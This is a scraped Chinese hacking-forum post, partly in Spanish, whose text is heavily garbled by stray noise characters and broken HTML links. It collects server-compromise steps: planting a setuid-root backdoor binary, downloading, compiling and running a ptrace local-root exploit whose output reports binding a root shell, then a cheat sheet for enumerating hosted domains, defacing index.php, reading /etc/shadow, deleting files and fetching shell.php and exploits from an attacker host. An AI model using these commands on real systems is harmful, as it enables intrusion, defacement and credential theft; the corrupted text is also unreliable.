- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0

我的地盘我做主
该用户从未签到
 |
< ><FONT color=#ff0000>by:cnbird</FONT></P>
* U5 P* [* q* ~2 J, C< >1.</P>( h* C, u* @: i" c4 R v+ B4 A
< >[cnbird@localhost tmp]#id</P>
* y3 a5 t; R* [3 |" G& I< >uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk)</P>
1 i4 c+ F2 I) K< >[cnbird@localhost tmp]#cp `which id ` .</P>7 H" n3 `/ _& [- I) c
< >[cnbird@localhost tmp]#chown root ./id</P>$ e, v( h: v$ [" U# S9 X- @& i
< >[cnbird@localhost tmp]#chmod 755 ./id ; chmod u+s ./id</P>$ e/ X- e+ y' l+ a% ?# g) {, |
< >[cnbird@localhost tmp]#ls -l ./id</P>% z M# q' l6 t/ C& ?9 ~% |
< >-rwsr-xr-x 1 root root 9264 Mar 8 21:36 ./id*</P> @, z3 i: h7 K4 `+ J( l# a4 A. \
< >[cnbird@localhost tmp]#exit</P>6 y) @3 b2 ]% W+ [" ^: `1 e1 M
< >[cnbird@localhost tmp]$id</P>/ V; I8 @, q" @" W; W5 J" l7 C
< >uid=500(cnbird) gid=500(cnbird) groups=500(cnbird)</P>
% f& F6 G' C! b< >[cnbird@localhost tmp]$./id </P>, \* k5 T4 U+ T( `, \: ?
< >uid=500(cnbird) gid=500(cnbird) euid=0(root) groups=500(cnbird)</P>. n! Z% W$ c: Z4 R% L2 g/ E
< >2.利用ptrace成为root的方法</P>2 O6 l0 ?1 }6 b& Z) b
< >[bash]# cd /tmp/; wget <a href="http://delivered.informaticahispana.org/ptrace.c" target="_blank" ><FONT color=#0000ff>http://delivered.informaticahispana.org/ptrace.c</FONT></A>; gcc ptrace.c -o ptrace; chmod -c 777 ptrace; ./ptrace
5 h& D- R+ N% F" t-> Parent's PID is 2313. Child's PID is 2314.
/ ]9 r H- y @1 {2 ~% C-> Attaching to 2315...
8 n7 [, R! k8 V6 |1 ?2 f-> Got the thread!!
7 M6 O1 O) F, \2 x5 n M-> Waiting for the next signal..." L# D4 z; A& h$ G
-> Injecting shellcode at 0x4000e85d
. ^9 \+ o+ A+ q0 H/ X" x-> Bind root shell on port 24876... =p
* X, f& e( C& } c3 H-> Detached from modprobe thread.
8 w. D1 l; Z4 z-> Committing suicide.....</P>8 `- f/ a! j+ l$ g
< >[bash]# id8 S5 P* X" x# L. _: w
uid=0(root) gid=0(root) groups=0(root)</P>
$ I- Q2 Z5 S2 d# j< > ara ver los dominios que hay en el server:9 f% t: v3 ]4 |% T& c3 t& Q5 Q& c8 f4 i
---------------------------------------------------------
: [! O& o+ }3 f* ^cat /etc/httpd/conf/httpd.conf|grep ServerName << Solo salen los dominios' p$ o. I, m7 z6 u$ F2 ~
cat /etc/httpd/conf/httpd.conf << Unicamente los puros dominios
( `0 T* f) s+ A$ Pcat /etc/localdomains << Unicamente los dominios locales! s( }/ ?& C7 W% |0 y
cat /etc/trueuserdomains << Revela los verdades propietarios de cada dominio
, Q; C7 J9 B8 bcat /etc/userdomains << Este es el mas comun- Y6 K Z, N3 M2 |" }
---------------------------------------------------------</P>
( s9 a5 m$ Q6 [$ W+ u- G< > ara ver la version de kernel:
6 E9 |- T6 p4 O+ s6 ~---------------------------------------------------------7 b# o S+ K' t; V. f. `+ A
uname -a <<Te sale algo asi Linux itys.host4u.net 2.4.20....., 2.4.20 viene siendo la version del kernel.# w( y, B7 @% Q, r, @) t4 C0 m
---------------------------------------------------------</P>
8 N0 b6 r2 ? X4 b: J: |, o9 M5 o% v< > ara modificar un index ya existente:$ ^. [2 C. p# }9 L% r* g& X
---------------------------------------------------------! L& y, }0 @. d5 B
echo "RootBox was OwNz You">index.php <<sobreescribe el archivo index.php con nuevo contenido& D" `8 y$ J7 S8 i. \
---------------------------------------------------------</P>' `/ R* S9 q% ^% [. T- C
< > ara subir, compilar, darle permisos de ejecucion y ejecutar un exploit:
) d) h2 k" \$ M' c---------------------------------------------------------
$ o* S) T( {& b/ m" Ocd /tmp/;wget <a href="http://web<a%20href=/" target="_blank" >_</A>atacante/exploit.c"><FONT color=#0000ff>http://web<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>atacante/exploit.c</FONT></A> <<aqui subimos el exploit
8 o0 d+ n k( C5 Q/ W6 ~cd /tmp/;cc exploit.c -o exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado <<aqui lo compilamos con el nombre de "exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado"
. m0 K2 t: t& acd /tmp/;chmod -c 777 exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado <<aqui le damos permisos de ejecucion a "exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado"
9 T( P d- }" j. ~1 T3 }: hcd /tmp/;./exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado <<aqui estamos ejecutando a "exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado". ( ?! D) |: C( w" ^
Hasta aqui termina el proceso para un exploit.! N" K1 l. j2 f
---------------------------------------------------------</P>
2 D4 f; t. b# C. J0 H! v< >Ver las contraseñas encriptadas de todos los usuarios:
8 t' M- A. f/ k& ^. b. J( n---------------------------------------------------------( @3 i. v' M3 C0 n }" g
cat /etc/shadow <<Solo funciona si tienes permisos como root.& B& ]! [# f: W. o' ~7 n/ X
---------------------------------------------------------</P>
3 C3 A6 u. f; l/ C< >Borrar un Ficher" N7 y8 i! R6 `5 R
---------------------------------------------------------
* C; A. e& o/ ncd /home/juan/public<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>html/;rm import.htm<<aqui estan borrando con el comando rm, el fichero import.htm
8 z ]9 S9 K8 ?: T. a6 o---------------------------------------------------------</P>
+ l2 O4 `# M+ x3 S& A* L< >Subir un ficher! j+ B5 ?& C: R& h( R, ?% ^9 j
---------------------------------------------------------; @9 ~3 ~( A' w; _% c; f
cd /home/juan/public<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>html/;wget <a href="http://web<a%20href=/" target="_blank" >_</A>atacante/shell.php<<ESTAMOS"><FONT color=#0000ff>http://web<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>atacante/shell.php<<Estamos</FONT></A> subiendo el fichero shell.php</P>6 ]# c1 a7 X; K7 Y
< >9 p! s: G' w7 O
<CENTER></CENTER> |
zan
|